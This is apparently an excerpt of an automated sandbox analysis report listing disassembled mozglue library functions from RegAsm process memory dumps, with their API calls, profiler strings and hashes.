                                                                                                                                                                                                                                                    • Instruction ID: ebd8b787e91adc5bfa3419196cbe33bd377cdf47611c644604c0fcbb18823203
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2af500fec09f665fcff4b40214fee8233caf6ff88658cdb1c4a2b916777bb0c9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6011C8717012119BDB019F58DA485BA7779EF5530CF880035ED2197B01CF71AA15CBAA
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C719420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: EnterCriticalSection.KERNEL32(6C75E370,?,?,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284), ref: 6C70AB94
                                                                                                                                                                                                                                                      • Part of subcall function 6C70AB89: LeaveCriticalSection.KERNEL32(6C75E370,?,6C6D34DE,6C75F6CC,?,?,?,?,?,?,?,6C6D3284,?,?,6C6F56F6), ref: 6C70ABD1
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C71945E
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719470
                                                                                                                                                                                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING,?,?,?,00000000,?,6C70F710,?,00000039,00000000,?,6C72138F,?,?,?), ref: 6C719482
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C71949F
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C719459
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C71946B
                                                                                                                                                                                                                                                    • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C71947D
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
                                                                                                                                                                                                                                                    • String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
                                                                                                                                                                                                                                                    • API String ID: 4042361484-1628757462
                                                                                                                                                                                                                                                    • Opcode ID: 64885a091d1511e3bec34acc82be8e43e82cd5aaed78a6a7576dd593ef19b61c
                                                                                                                                                                                                                                                    • Instruction ID: aa00cf2a5a49962619b32c1b02d56c0df09c9b8a36dd7d7d70e305ba54922ebf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64885a091d1511e3bec34acc82be8e43e82cd5aaed78a6a7576dd593ef19b61c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1001D870A041018BD7009B6DDE15B5B33B59B0932EF480936DD2B86F41DE22D9658957
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C720F40 Relevance: 12.2, APIs: 8, Instructions: 171threadtimeCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720F6B
                                                                                                                                                                                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C720F88
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6C720FF7
                                                                                                                                                                                                                                                    • InitializeConditionVariable.KERNEL32(?), ref: 6C721067
                                                                                                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(?,?,?), ref: 6C7210A7
                                                                                                                                                                                                                                                    • ?profiler_capture_backtrace_into@baseprofiler@mozilla@@YA_NAAVProfileChunkedBuffer@2@W4StackCaptureOptions@2@@Z.MOZGLUE(00000000,?), ref: 6C72114B
                                                                                                                                                                                                                                                      • Part of subcall function 6C718AC0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,6C7212F7), ref: 6C718BD5
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C721174
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C721186
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ?profiler_capture_backtrace_into@baseprofiler@mozilla@@Buffer@2@CaptureChunkedCurrentNow@Options@2@@ProfileStackStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2803333873-0
                                                                                                                                                                                                                                                    • Opcode ID: ac8ba6d72e854658a728f8495ed8c326ac840398fcc23bbc57cdac91dce1806c
                                                                                                                                                                                                                                                    • Instruction ID: d104853a22cd7c941e4d2d5044339edea5502fc94ca71c34a49b0ef94c2e54c2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac8ba6d72e854658a728f8495ed8c326ac840398fcc23bbc57cdac91dce1806c
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C761F375A043449FDB10CF25CA98BAAB7F6BFC5308F14892DE89947711EB35E849CB81
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DE9C0 Relevance: 12.1, APIs: 8, Instructions: 133COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,6C6E1999), ref: 6C6DEA39
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,7FFFFFFE), ref: 6C6DEA5C
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(7FFFFFFE,00000000,?), ref: 6C6DEA76
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(-00000001,?,?,6C6E1999), ref: 6C6DEA9D
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,7FFFFFFE,?,?,?,6C6E1999), ref: 6C6DEAC2
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(?,00000000,00000000,?,?,?,?), ref: 6C6DEADC
                                                                                                                                                                                                                                                    • free.MOZGLUE(7FFFFFFE,?,?,?,?), ref: 6C6DEB0B
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?), ref: 6C6DEB27
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpymemsetmoz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 706364981-0
                                                                                                                                                                                                                                                    • Opcode ID: 60f710cfde813755934514befa1bac0a4682f0649bf4a94f54de042e6ff95a7b
                                                                                                                                                                                                                                                    • Instruction ID: aba6d328e2eff0bec95803f41ebf5cd61c75e2f276c32b4858ff07ccfe1ce973
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60f710cfde813755934514befa1bac0a4682f0649bf4a94f54de042e6ff95a7b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B441F9B1A002169FDB14CF68CC84AAEB7B4FF45358F290664E825DB794E730E904C7D5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DB630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB6AC
                                                                                                                                                                                                                                                      • Part of subcall function 6C6ECA10: malloc.MOZGLUE(?), ref: 6C6ECA26
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB6D1
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB6E3
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB70B
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB71D
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C6DB61E), ref: 6C6DB73F
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(80000023,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB760
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C6DB61E,?,?,?,?,?,00000000), ref: 6C6DB79A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1394714614-0
                                                                                                                                                                                                                                                    • Opcode ID: fbb184ccc9443bb41fda517d3ff1c7f1bb4fab80bc12c67f45ccc5dedafbaf2a
                                                                                                                                                                                                                                                    • Instruction ID: 8abc56cd470829f0a32395a6a50452b899f5e4f0c7d1d37a375188b13091faf2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbb184ccc9443bb41fda517d3ff1c7f1bb4fab80bc12c67f45ccc5dedafbaf2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D941B3B2D001159FCB04DF68DC846AEB7B5FB85324F260629E825E7784E731AD0487E9
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6DEF30 Relevance: 12.1, APIs: 8, Instructions: 128COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(6C755104), ref: 6C6DEFAC
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6DEFD7
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C6DEFEC
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6DF00C
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6C6DF02E
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000000,?), ref: 6C6DF041
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6DF065
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE ref: 6C6DF072
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfree
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1148890222-0
                                                                                                                                                                                                                                                    • Opcode ID: 174b4154797b402fb653aa2904472e4e9bfcccf7a2290e27e3089a67d69e44d7
                                                                                                                                                                                                                                                    • Instruction ID: 01e3b0d58119acc03a4ebde78f927fa051ada936924f779ffc63d9e932f3b045
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174b4154797b402fb653aa2904472e4e9bfcccf7a2290e27e3089a67d69e44d7
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 664107F1A002059FCB08CF68DC949BE7769BF89318B254228E815DB794EB31E905C7E6
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C74B540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C74B5B9
                                                                                                                                                                                                                                                    • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C74B5C5
                                                                                                                                                                                                                                                    • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C74B5DA
                                                                                                                                                                                                                                                    • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C74B5F4
                                                                                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 6C74B605
                                                                                                                                                                                                                                                    • ?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C74B61F
                                                                                                                                                                                                                                                    • std::_Facet_Register.LIBCPMT ref: 6C74B631
                                                                                                                                                                                                                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C74B655
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1276798925-0
                                                                                                                                                                                                                                                    • Opcode ID: 9b0d6ba457c5072db5a1226895b01a90620eabe9afef1726649ae5d2d96dd883
                                                                                                                                                                                                                                                    • Instruction ID: 66a9df12dddb287b6ae05bd07d4ed1f6c2e685462dffa0f9b3ade0467f101fb9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9b0d6ba457c5072db5a1226895b01a90620eabe9afef1726649ae5d2d96dd883
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E4319C71B002088BCF00AF69C9999BEB7B5FB8A324B540579D90697780DF30BD06CB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C716590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: GetCurrentThreadId.KERNEL32 ref: 6C70FA8D
                                                                                                                                                                                                                                                      • Part of subcall function 6C70FA80: AcquireSRWLockExclusive.KERNEL32(6C75F448,?,6C70FA1F,?,?,6C6E5407), ref: 6C70FA99
                                                                                                                                                                                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C716727
                                                                                                                                                                                                                                                    • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C7167C8
                                                                                                                                                                                                                                                      • Part of subcall function 6C724290: memcpy.VCRUNTIME140(?,?,?,:rl,?,:rl,00000001,?,6C723AED,?,00000001), ref: 6C7242C4
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                                                    • String ID: data$vul
                                                                                                                                                                                                                                                    • API String ID: 511789754-1154025971
                                                                                                                                                                                                                                                    • Opcode ID: 84e54c2d76aecee2fe4262390db8151eac1391b9e999299a974cf4f4d2546605
                                                                                                                                                                                                                                                    • Instruction ID: b676f699b8129a1bb282e9a0afa457338a55f85ca5601c7985177b7cd2eb4b6f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84e54c2d76aecee2fe4262390db8151eac1391b9e999299a974cf4f4d2546605
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDD1DF75A083408FD724DF25C944B9BBBE5EFD5308F14892EE48987B91EB30A909CB52
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C70D5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C6DEB57,?,?,?,?,?,?,?,?,?), ref: 6C70D652
                                                                                                                                                                                                                                                    • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C6DEB57,?), ref: 6C70D660
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C6DEB57,?), ref: 6C70D673
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C70D888
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                                                    • String ID: Wml$|Enabled
                                                                                                                                                                                                                                                    • API String ID: 4142949111-2265074722
                                                                                                                                                                                                                                                    • Opcode ID: d4bff97cc90946a1fe2c22cfb26b9cfd2c61c0d1db56b49d6a96fe84d04c1f2e
                                                                                                                                                                                                                                                    • Instruction ID: 8d53e73f6dfe96e383bd406a1a018081099823b84c950174a3ee555760504e37
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d4bff97cc90946a1fe2c22cfb26b9cfd2c61c0d1db56b49d6a96fe84d04c1f2e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2A116B0B043048FDB11CF69C5807AEBBF1AF5A318F14806DD899AB781D735A945CBA5
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6E9830 Relevance: 10.7, APIs: 7, Instructions: 196COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • free.MOZGLUE(?,?,?,6C737ABE), ref: 6C6E985B
                                                                                                                                                                                                                                                    • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,6C737ABE), ref: 6C6E98A8
                                                                                                                                                                                                                                                    • moz_xmalloc.MOZGLUE(00000020), ref: 6C6E9909
                                                                                                                                                                                                                                                    • memcpy.VCRUNTIME140(00000023,?,?), ref: 6C6E9918
                                                                                                                                                                                                                                                    • free.MOZGLUE(?), ref: 6C6E9975
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.1985448037.000000006C6D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C6D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985412101.000000006C6D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985656920.000000006C74D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985701886.000000006C75E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.1985723941.000000006C762000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_6c6d0000_RegAsm.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: free$_invalid_parameter_noinfo_noreturnmemcpymoz_xmalloc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1281542009-0
                                                                                                                                                                                                                                                    • Opcode ID: 71ce5e54a662e09035e5d9ca07d146963dbfa93ddd81b23dfc5717009b2c4f07
                                                                                                                                                                                                                                                    • Instruction ID: acaf25d98e194dcf06b155e8899c090d29b2cc42555ae106d010670578a41213
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71ce5e54a662e09035e5d9ca07d146963dbfa93ddd81b23dfc5717009b2c4f07
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B718CB460A7058FC725CF28C480996B7F1FF4E3287244A6AD85A8BBA0D771F846CF55
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Function 6C6EB790 Relevance: 10.6, APIs: 7, Instructions: 147COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE,?,?,6C71DC2C), ref: 6C6EB7E6
                                                                                                                                                                                                                                                    • ?good@ios_base@std@@QBE_NXZ.MSVCP140(?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE,?,?,6C71DC2C), ref: 6C6EB80C
                                                                                                                                                                                                                                                    • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(?,00000000,?,6C72CC83,?,?,?,?,?,?,?,?,?,6C72BCAE), ref: 6C6EB88E
